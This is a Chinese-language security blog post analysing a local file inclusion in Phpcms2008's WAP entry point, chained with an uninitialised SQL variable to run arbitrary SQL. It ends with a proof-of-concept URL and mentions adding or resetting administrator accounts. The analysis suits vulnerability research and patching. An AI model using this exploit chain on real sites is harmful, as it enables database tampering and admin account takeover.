Phpcms2008本地文件包含漏洞可执行任意SQL语句

2010年09月13日 | 学习笔记,工具收集| 坏人咖啡

作者：oldjun

Phpcms2008之前已经暴过很多问题了，但这个本地包含一直无人提起，小明曾经在t00ls里核心版块说过，但其实这个本地包含即使不通过旁注也是有办法利用的，那就是增加管理员或者修改管理员密码！

好了，先说本地包含，有几处，我不知道乌云上说的是哪一处，于是我就当其说的是最明显的那处吧。很明显的漏洞，不知道为啥还在phpcms中出现，先看代码：

文件在wap/index.php

[php]
<?php
include ‘../include/common.inc.php’;
include ‘./include/global.func.php’;
$lang = include ‘./include/lang.inc.php’;
if(preg_match(‘/(mozilla|m3gate|winwap|openwave)/i’, $_SERVER[‘HTTP_USER_AGENT’]))
{
header(‘location:../’);//判断，调试时先注释掉
}
wmlHeader($PHPCMS[‘sitename’]);//判断，调试时先注释掉

$action = isset($action) && !empty($action) ? $action : ‘index’;//直接把action带进来了
if($action)
{
include ‘./include/’.$action.’.inc.php’;//本地包含
}

$html = CHARSET != ‘utf-8’ ? iconv(CHARSET, ‘utf-8’, $html) : $html;
echo str_replace(‘
‘, "
\n", $html);
wmlFooter();
?>
[/php]

去掉几处判断条件就可以调试了，action没有进行限制与过滤，然后悲剧的全局：

[php]
if($_REQUEST)
{
if(MAGIC_QUOTES_GPC)
{
$_REQUEST = new_stripslashes($_REQUEST);
if($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE);
extract($db->escape($_REQUEST), EXTR_SKIP);
}
else
{
$_POST = $db->escape($_POST);
$_GET = $db->escape($_GET);
$_COOKIE = $db->escape($_COOKIE);
@extract($_POST,EXTR_SKIP);
@extract($_GET,EXTR_SKIP);
@extract($_COOKIE,EXTR_SKIP);
}
if(!defined(‘IN_ADMIN’)) $_REQUEST = filter_xss($_REQUEST, ALLOWED_HTMLTAGS);
if($_COOKIE) $db->escape($_COOKIE);
}
[/php]

于是可以成功本地包含，剩下来的就是这个本地包含怎么利用的问题了。包含的文件限制为*.inc.php，phpcms的开发者非常喜欢用这个命名规则，于是好多好多文件都是说明什么.inc.php，随便包含一个有利用价值的即可，随便找找：

formguide/admin/include/fields/datetime/field_add.inc.php

[php]
<?php
if($dateformat == ‘date’)
{
$sql = "ALTER TABLE $tablename ADD $field DATE NOT NULL DEFAULT ‘0000-00-00’";
}
elseif($dateformat == ‘datetime’)
{
$sql = "ALTER TABLE $tablename ADD $field DATETIME NOT NULL DEFAULT ‘0000-00-00 00:00:00’";
}
elseif($dateformat == ‘int’)
{
if($format)
$sql = "ALTER TABLE $tablename ADD $field INT UNSIGNED NOT NULL DEFAULT ‘0’";
}

$db->query($sql);//$sql等于没有初始化?>
[/php]

$dateformat不初始化，$sql就没有初始化，于是直接可以执行了：

POC：
http://127.0.0.1/phpcms/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=select 1

有兴趣的朋友可以试一下